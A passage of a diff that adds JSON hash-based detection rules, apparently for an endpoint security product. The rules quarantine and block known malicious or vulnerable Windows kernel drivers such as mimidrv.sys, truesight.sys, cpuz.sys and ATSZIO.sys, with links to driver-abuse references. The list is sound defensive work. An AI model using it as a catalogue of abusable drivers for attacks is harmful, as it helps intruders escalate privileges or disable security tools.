+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464274Z",
+ "creation_date": "2026-03-23T11:45:30.464277Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464295Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ddf427ce55b36db522f638ba38e34cd7b96a04cb3c47849b91e7554bfd09a69a",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f174fe92-7627-5b5a-b372-18523243d89c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977671Z",
+ "creation_date": "2026-03-23T11:45:29.977674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977683Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427",
+ "comment": "Malicious Kernel Driver (aka ndislan.sys) [https://www.loldrivers.io/drivers/ca1e8664-841f-4e4b-9e67-3f515cc249c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f17a2fde-af7e-51b3-a83e-26cf8ccc52b0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.822562Z",
+ "creation_date": "2026-03-23T11:45:31.822564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.822569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "38980f591007022c8f68c2eabf2aa3cafc10c0e9c309d55b72caeb800b6b9cb3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1807d93-e4bc-56b6-b0d4-020298ed4860",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140889Z",
+ "creation_date": "2026-03-23T11:45:31.140891Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140897Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fdc25ef91df92c829a9c6a84d113c9d2aba8a2d0e8f4216811b65b24545849a7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f18c26ff-19aa-5bb8-93f3-1f86c2ad22dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151126Z",
+ "creation_date": "2026-03-23T11:45:31.151128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151133Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "096b82775ee0664258be2fdbed5010df114b58bbdd5c6d2d13c19d2ad3304c3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f18d4bae-38cb-57c7-a551-61d373e887d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828772Z",
+ "creation_date": "2026-03-23T11:45:30.828774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3feab99a4a150a7eac92105a60ce736a73c84959e7c219e7609e080e389e21f8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f191ff4f-7a22-52d1-b856-c97c51254e3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473172Z",
+ "creation_date": "2026-03-23T11:45:31.473176Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473185Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2728b3f04b4a6bbfcdeeecdf37658ed19efc51801b4e7bde68c874db10a5115",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f19c9e47-a87b-512a-97ef-ddc138101834",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478731Z",
+ "creation_date": "2026-03-23T11:45:30.478734Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3de38ef40dbda07a537a7e48cb5d59dbd17bf27d5d399b32df737cd67c0cdb25",
+ "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f19fb2c4-a6c1-5285-97f0-6b468e58cceb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815561Z",
+ "creation_date": "2026-03-23T11:45:31.815563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14d4cb61507001029e0a38335390e1c5f67b367265fb121444bc1cedd7fc2180",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1aa4c15-bb4d-5d04-a94f-e9c64a3c7d16",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474146Z",
+ "creation_date": "2026-03-23T11:45:30.474150Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e05b62738ebb09250227e87908d67a3fc74e4c684d5a86ef935243a6f0e06792",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1b05792-b635-5a2f-bfbd-80e45e738dba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146438Z",
+ "creation_date": "2026-03-23T11:45:31.146440Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146445Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2dc643b646da999eac18f03008f15fc7a7b3fd5595421c414030f41d779a7fee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1b2f70b-c231-5b16-854a-5616cbf61ca8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817587Z",
+ "creation_date": "2026-03-23T11:45:31.817589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9bfeefddca836d1ed653f58afb55c1de163ad9ad16ae2d4dd773689215700c36",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1bd710a-5125-5dd5-a15b-063fb78c0367",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481743Z",
+ "creation_date": "2026-03-23T11:45:31.481747Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481757Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1639041f4e68b08a44878dd42ea8f9123bfb61a7e551ecc4588aa15c9a108d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1bdc46f-a13c-5c02-85c2-286df9d3f7bd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612674Z",
+ "creation_date": "2026-03-23T11:45:29.612679Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612686Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e64c1bbaa6b5dba3f3795f5932511f8f8a49d68d420267896e2e4e51b9d46bc",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1c3031c-2d8f-5415-81c7-7202273e1331",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146726Z",
+ "creation_date": "2026-03-23T11:45:31.146728Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146734Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3deb79134902ff1594ba01d8b3fe1b8538f6679a5bb226db6445c97b9d824fda",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1d5f552-7b6a-5873-ab52-822835dc9a98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619160Z",
+ "creation_date": "2026-03-23T11:45:29.619162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a00b50cc1d95abc3ada635f331c5911d1aaf9ae8b86d359db6fc7f6fc5eb0c94",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1d8e0a5-d166-5b0b-a346-2fb8186c760e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146583Z",
+ "creation_date": "2026-03-23T11:45:32.146585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89036534a3da657882da96d9f211ae41efab4083bd6dbedbeaa2516d1d04cff4",
+ "comment": "Malicious Kernel Driver (aka driver_89036534.sys) [https://www.loldrivers.io/drivers/750a8aa9-a87c-4142-b96b-18ea139ada14/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1db1a3b-5dc5-509d-83de-0402a17b315e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807900Z",
+ "creation_date": "2026-03-23T11:45:31.807904Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807912Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0303bcb24f12bf45eb3dc32a339e8beb5a4b9c7061a5d8284c8d08c418ed1945",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1dbd499-5d90-55e9-aae7-9cce5299e54c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150669Z",
+ "creation_date": "2026-03-23T11:45:31.150671Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150676Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "94955464e5e0c0d8e02fc1a834edb7b6cac474c07f55ada866de19052596ec94",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1ddf1ca-6cf6-5487-8de0-8d7772d2f903",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833480Z",
+ "creation_date": "2026-03-23T11:45:30.833483Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d4a05d39bdc3085f6ad89d075e134de712d6d291a44d4a6917d49455b6f22e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1e310fe-9cd0-5be8-98e4-cbb974b7a281",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830455Z",
+ "creation_date": "2026-03-23T11:45:30.830458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2cb79703aca300534076b6a50ce979a0e2f7ef66b925d274d5f129d7326d2e4b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1e4fa9d-1398-5c6e-8044-ca2f4bca0ce5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830482Z",
+ "creation_date": "2026-03-23T11:45:31.830484Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830489Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32407d25620fced3f4ab040008605cc3da0b35f54384b832563877912bc4fe67",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1e52fd2-25e6-5c40-a575-2fc6df4b5e91",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
